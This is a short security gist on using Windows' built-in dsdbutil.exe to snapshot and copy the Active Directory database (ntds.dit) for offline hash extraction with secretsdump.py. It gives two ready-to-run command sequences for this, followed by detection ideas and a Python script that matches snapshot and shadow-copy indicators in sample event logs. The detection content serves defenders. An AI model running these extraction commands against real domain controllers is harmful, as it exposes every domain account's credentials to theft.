@bohops
Last active February 21, 2023 14:29
yet another native AD database extraction utility
DSDButil
========
- dsdbutil (dsdbutil.exe) is a utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
- Example #2: Living dangerously with (assumed) snapshot identifier
dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.
===========================
*Defensive Considerations
I chatted with @SBousseaden about a few Sysmon detection strategies. Here are a few ideas:
- Command-line logging is useful: dsdbutil can run a string of commands (as demonstrated above)
or interactively (which hides the actual commands from command-line logging)
- Although a bit cumbersome, the "Service Control Manager" source for VSS will be logged as System Event ID 7036 with
a description of "The Microsoft Software Shadow Copy Provider service entered the running state."
- If a volume is mounted, an "NTFS" source will be logged as System Event ID 98 with a description highlighting
the Volume Shadow Copy ID such as "Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed."
- With a mount operation, dsdbutil mounts the snapshot at the logical drive root with a prefix
of "$SNAP_" (e.g. C:\$SNAP_201906250551_VOLUMEC$\). This has utility for monitoring interesting "Image Names"
or paths in Sysmon events (e.g. FileCreate, Execute, etc.).
- And of course, Sysmon Events that contain "HarddiskVolumeShadowCopy" within the Image and Cmdline fields are always interesting as well
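As an added example (not part of the gist), here is a small Python detector that applies the indicators above to constructed sample System/Sysmon records. The flattened dict shape, field names and labels are assumptions for illustration, not a real event-log parser.

```python
import re

# Constructed sample records (not real telemetry), flattened to plain dicts.
SAMPLE_EVENTS = [
    {"log": "Sysmon", "id": 1, "Image": r"C:\Windows\System32\dsdbutil.exe",
     "CommandLine": 'dsdbutil.exe "activate instance ntds" "snapshot" "create" "mount 1" "quit" "quit"'},
    {"log": "System", "id": 7036, "Source": "Service Control Manager",
     "Description": "The Microsoft Software Shadow Copy Provider service entered the running state."},
    {"log": "System", "id": 98, "Source": "NTFS",
     "Description": r"Volume ?? (\Device\HarddiskVolumeShadowCopy17) is healthy. No action is needed."},
    {"log": "Sysmon", "id": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\$SNAP_201906250551_VOLUMEC$\Windows\NTDS\ntds.dit"},
    {"log": "Sysmon", "id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Mounted snapshot root, e.g. C:\$SNAP_201906250551_VOLUMEC$\
SNAP_ROOT = re.compile(r"^[A-Za-z]:\\\$SNAP_\d+_VOLUME[A-Z]\$\\", re.I)
SHADOW_COPY = re.compile(r"HarddiskVolumeShadowCopy\d+", re.I)
DSDBUTIL_SNAPSHOT = re.compile(r"dsdbutil(\.exe)?\b.*\bsnapshot\b", re.I)


def classify(ev):
    """Return the labels matched by one event; an empty list means no rule fired."""
    hits = []
    if ev["log"] == "Sysmon":
        # Flag the binary itself too: in interactive mode the command line is bare.
        if ev.get("Image", "").lower().endswith("\\dsdbutil.exe"):
            hits.append("dsdbutil_image")
        if DSDBUTIL_SNAPSHOT.search(ev.get("CommandLine", "")):
            hits.append("dsdbutil_snapshot_cmdline")
        for field in ("Image", "CommandLine", "TargetFilename"):
            value = ev.get(field, "")
            if SNAP_ROOT.search(value):
                hits.append(f"snap_mount_path:{field}")
            if SHADOW_COPY.search(value):
                hits.append(f"shadowcopy_ref:{field}")
    elif ev["log"] == "System":
        desc = ev.get("Description", "")
        if ev["id"] == 7036 and "Shadow Copy Provider" in desc and "running state" in desc:
            hits.append("vss_provider_started")
        if ev["id"] == 98 and ev.get("Source") == "NTFS" and SHADOW_COPY.search(desc):
            hits.append("shadowcopy_volume_mounted")
    return hits


def scan(events):
    """Map each matching event's index to its labels, skipping events with no hits."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Correlating these labels within a short window on the same host (dsdbutil execution, VSS provider start, a new shadow copy, then file activity under a $SNAP_ path) is far stronger than alerting on any single one.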